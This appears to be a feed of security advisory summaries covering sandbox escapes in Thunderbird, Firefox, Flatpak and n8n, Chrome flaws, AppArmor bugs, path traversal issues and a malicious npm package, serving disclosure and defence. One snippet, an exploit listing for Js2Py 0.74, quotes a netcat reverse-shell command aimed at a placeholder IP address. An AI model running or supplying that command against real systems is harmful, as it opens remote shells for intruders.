Mozilla Thunderbird < 140.10.1

The version of Thunderbird installed on the remote macOS or Mac OS X host is prior to 140.10.1. It is, therefore, affected by multiple vulnerabilities as referenced in the mfsa2026-39 advisory. - Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This...

Amazon Linux 2023 : flatpak, flatpak-devel, flatpak-libs (ALAS2023-2026-1601)

It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2023-2026-1601 advisory. A complete sandbox escape vulnerability exists in Flatpak before 1.16.4. The Flatpak portal accepts paths in the sandbox-expose options which can be app-controlled symlinks pointing at arbitra...

Mozilla Thunderbird < 140.10.1

The version of Thunderbird installed on the remote Windows host is prior to 140.10.1. It is, therefore, affected by multiple vulnerabilities as referenced in the mfsa2026-39 advisory. - Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was...

Amazon Linux 2 : flatpak, --advisory ALAS2-2026-3261 (ALAS-2026-3261)

The version of flatpak installed on the remote host is prior to 1.0.9-10. It is, therefore, affected by a vulnerability as referenced in the ALAS2-2026-3261 advisory. A complete sandbox escape vulnerability exists in Flatpak before 1.16.4. The Flatpak portal accepts paths in the sandbox-expose...

Js2Py 0.74 - RCE

Exploit Title: Js2Py 0.74 - RCE Date: 2026-02-03 Exploit Author: Ali Sünbül xeloxa Author Page: https://github.com/xeloxa Vendor Homepage: https://github.com/PiotrDabkowski/Js2Py Software Link: https://pypi.org/project/Js2Py/ Version: payload.js python3 exploit.py -c "nc -e /bin/bash 10.10.10.10...

GHSA-44V6-JHGM-P3M4 n8n has a Python Task Runner Sandbox Escape Vulnerability

Impact An authenticated user with permission to create or modify workflows containing a Python Code Node could escape the sandbox and achieve arbitrary code execution on the task runner container. - This issue only affects instances where the Python Task Runner is enabled. Patches The issue has...

n8n has a Python Task Runner Sandbox Escape Vulnerability

Impact An authenticated user with permission to create or modify workflows containing a Python Code Node could escape the sandbox and achieve arbitrary code execution on the task runner container. - This issue only affects instances where the Python Task Runner is enabled. Patches The issue has...

Malicious Package

Overview apple-infra-escape-audit is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this...

Malicious code in apple-infra-escape-audit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c4ca3e5d6066fa58a9fe52cc968a31569064af5959443ab3b8088f088c72b851 The package apple-infra-escape-audit was found to contain malicious code. Source: ghsa-malware...

MAL-2026-3166 Malicious code in apple-infra-escape-audit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c4ca3e5d6066fa58a9fe52cc968a31569064af5959443ab3b8088f088c72b851 The package apple-infra-escape-audit was found to contain malicious code. Source: ghsa-malware...

USN-8224-1 linux-bluefield vulnerabilities

Qualys discovered that several vulnerabilities existed in the AppArmor Linux kernel Security Module LSM. An unprivileged local attacker could use these issues to load, replace, and remove arbitrary AppArmor profiles causing denial of service, exposure of sensitive information kernel memory, local...

USN-8224-1: Linux kernel (BlueField) vulnerabilities

Qualys discovered that several vulnerabilities existed in the AppArmor Linux kernel Security Module LSM. An unprivileged local attacker could use these issues to load, replace, and remove arbitrary AppArmor profiles causing denial of service, exposure of sensitive information kernel memory, local...

BIT-PYTHON-MIN-2026-3087 shutil.unpack_archive() doesn't check for Windows absolute paths in ZIPs

If shutil.unpackarchive is given a ZIP archive with an absolute Windows path containing a drive C:\... then the archive will be extracted outside the target directory which is different than other operating systems. Only Windows is affected by this vulnerability...

CVE-2026-35368

A flaw was found in uutils coreutils. The chroot utility, when used with the --userspec option, resolves user specifications after entering a restricted environment chroot but before relinquishing root privileges. This can cause the Name Service Switch NSS, a system for resolving system...

BIT-MLFLOW-2025-15036 Path Traversal Vulnerability in mlflow/mlflow

A path traversal vulnerability exists in the extractarchivetodir function within the mlflow/pyfunc/dbconnectartifactcache.py file of the mlflow/mlflow repository. This vulnerability, present in versions before v3.7.0, arises due to the lack of validation of tar member paths during extraction. An...

Linux Distros Unpatched Vulnerability : CVE-2026-7344

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Use after free in Accessibility in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to...

Google Chrome < 147.0.7727.137 Multiple Vulnerabilities

The version of Google Chrome installed on the remote macOS host is prior to 147.0.7727.137. It is, therefore, affected by multiple vulnerabilities as referenced in the 202604stable-channel-update-for-desktop28 advisory. - Use after free in Canvas in Google Chrome on Linux, ChromeOS prior to...

Mozilla Firefox ESR < 140.10.1

The version of Firefox ESR installed on the remote macOS or Mac OS X host is prior to 140.10.1. It is, therefore, affected by multiple vulnerabilities as referenced in the mfsa2026-36 advisory. - Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This...

Linux Distros Unpatched Vulnerability : CVE-2026-7321

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was fixed in Firefox 150, Thunderbird 150, Firefox E...

Linux Distros Unpatched Vulnerability : CVE-2026-7345

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Insufficient validation of untrusted input in Feedback in Google Chrome prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer proce...